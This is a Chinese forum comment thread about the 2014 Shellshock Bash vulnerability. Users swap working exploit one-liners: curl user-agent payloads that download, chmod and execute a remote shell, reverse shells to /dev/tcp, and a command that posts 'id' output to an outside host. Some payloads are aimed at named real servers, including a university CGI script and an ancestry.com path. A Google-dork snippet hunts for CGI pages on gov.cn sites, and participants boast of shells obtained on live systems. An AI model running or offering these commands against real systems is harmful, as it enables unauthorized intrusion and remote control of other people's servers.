早啊

早上起来更新系统，发现打过补丁的bash已经在源里了

脚本里面必须要有/usr/bin/env 吗

这是一个悲伤的故事

卧槽 乌云酒吧又要多一种酒了

测试了一下我的 php 环境，虽然在脚本中 $_ENV 是可以被 HTTP 请求控制，但是 shell 出来的 bash 进程中只保留了 PHPRC, SCRIPT_FILENAME, PHP_FCGI_MAX_REQUESTS 等几个用户不可控的变量，无法利用。

@Allmylife 不需要，只要 cgi 创建了新 bash 进程即可。 env 是打印当前环境变量做调试用

一大早新闻满天飞 这真是一个悲伤的故事

哇

由于 selinux 的原因，貌似不能在 /cgi-bin 目录下创建文件，也不能 curl

wormable

现在可以回显了，开撸=A=

利用脚本 https://github.com/ctxis/ActiveScanPlusPlus/blob/master/activeScan%2B%2B.py

@livers 真快啊，我等吊死苦逼了

要输出才有回显吧

Bash 3.0-4.3 Command Execution(CVE-2014-6271) POC & Exploit：http://www.beebeeto.com/pdb/poc-2014-0027/

足够喝一壶了……

@360网站卫士 还要邀请码？

@livers 脚本用户不鸟

都加班去了。

关注

关注

@园长 求工具~

ZoomEye:测试的两个要点，一是 cgi 程序里需要创建子进程，第二是环境变量可控。环境变量可以用 useragent，querystring， x-forward-for 等多个 http 特性进行污染。测试的时候请使用 curl 而不是浏览器，以免 payload 被 urlencode 转义。

好洞

@mango http://p2j.cn/?p=1495

这个洞还可以用来日git

@园长  = =、、、、求编译

@mango 这个漏洞利用方式很简单，设置下ua就行了。剩下的就是执行你的后门程序。

为什么还没人刷起呢？

@he1renyagao 让子弹飞一会

@Ricter 咋回显？

@xsser   有没有觉得这是鸡肋

@TellYouThat 反弹回来

@Ricter 咋回显？

试验了几十个，到目前为止还没有成功的

刷起来

id >/tmp/xx; wget weisuo.org/recv.php --post-file=/tmp/xx

没成功的，靠,园长那个还要附加jar包才能编译,不好用
@园长，求弄成jar

没找到实例

poc是
curl -A "() { :; }; /usr/bin/wget http://xxx/shell -O /tmp/shell" http://目标/cgi-bin/*.cgi

curl -A '() { :; }; /usr/bin/wget http://xxx/shell -O /tmp/shell' http://目标/cgi-bin/*.cgi

@疯狂 听说发工具要违法，所以以后基本上都只会发代码吖。

curl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP/PORT 0>&1"

没测成功一个。。。

单引号还是双引号哦？

@园长 我编译时访问不了  
Document doc = Jsoup.connect("https://www.google.ws/search?q=filetype:cgi+inurl:cgi-bin+site:gov.cn&num=100&newwindow=1&biw=1440&bih=710&ei=qpojVIrRIJPX8gWU_4GwDg&start=300&sa=N").userAgent("Googlebot/2.1 (+http://www.googlebot.com/bot.html)").timeout(5000).get();

@xxx 你仔细看～～～是不是打错了

curl -A '() { :; }; /bin/wget http://xxxx/shell -O /tmp/shell' http://post.usts.edu.cn/cgi-bin/vqregister/vqregister.cgi

curl -A '() { :; }; /bin/chmod 777 /tmp/shell' http://post.usts.edu.cn/cgi-bin/vqregister/vqregister.cgi

curl -A "() { :; }; exec /tmp/shell" http://post.usts.edu.cn/cgi-bin/vqregister/vqregister.cgi

哪里有问题，老执行不了呢

Apache/2.2.29 下不能成功

基本没成功过。不知道是不是方法问题

- _ -   没找到实例！！！！！

@小小剑士 终于成功了,原来是需要前提是你使用bash来执行脚本,而我们一般都是使用sh(!/bin/sh)来执行的,所以是不会成功的

@小小剑士？ POC给出来瞅瞅，你意思是需要服务器那边执行bash命令？

@疯狂 哪里看到的呢

/bin/bash -c /usr/bin/wget http://xxx/ft.pl -o /tmp/ft.pl
/bin/bash -c /usr/bin/perl /tmp/ft.pl xxxx 12345

@社长 闭嘴，我和你没爱了！！桑心的一波波

@疯狂 我刚才说错了,应该看看你的/bin/sh 是否链接到bash,如果是的话,默认就是bash了,测试文件可以直接用apache/cgi-bin/test-cgi来测试,不用进行修改

@疯狂 对了,默认需要加一个执行权限chmod +x test-cgi

已成功一个。PS:太少了

@黑色的屌丝 求共享

@黑色的屌丝 求法……我要试一试……

请叫我红领巾.
proxychains  curl http://searches.rootsweb.ancestry.com/cgi-bin/Genea/soundex.sh -H 'X: () { :;}; /bin/bash -i >& /dev/tcp/123.1.1.1/8080 0>&1'

靠，成功一个，日，太垃圾了，可以反弹shell嘿嘿

啊呜。。一直在失败从成功过

curl http://XXXX -A "() { :;}; /bin/sh -i >& /dev/tcp/XX.XXX.XX.XX/8080 0>&1"

已成功国内2个，反弹回shell。

在朋友帮助下成功了一次

@Xeyes ip已泄漏

@Xeyes 这个可以反弹

给个成功的URL，写个工具。

@dren 他用的TOR

@疯狂 发过来，我试试……

@蒙塔基的钢弹 发出来试试……

@流星warden console后面有反弹的ip，还有console title上面也写着ip

@流星warden console后面有反弹的ip，还有console title上面也写着ip

@疯狂 求成功反弹语句

@蒙塔基的钢弹 只需要在url上面加/cgi-bin/吗？

针对这个poc.cgi没见到什么特别的地方啊

吊啊，现在主要用什么工具

@园长 发工具的时候遮住脸，就不会被查水表啦·~

刚看到...一个帖子  用metasploit的模块.....然后另一台centos重启网络  也就是service network restart2 .....然后居然奇迹般的命令执行了！！！！！什么黑科技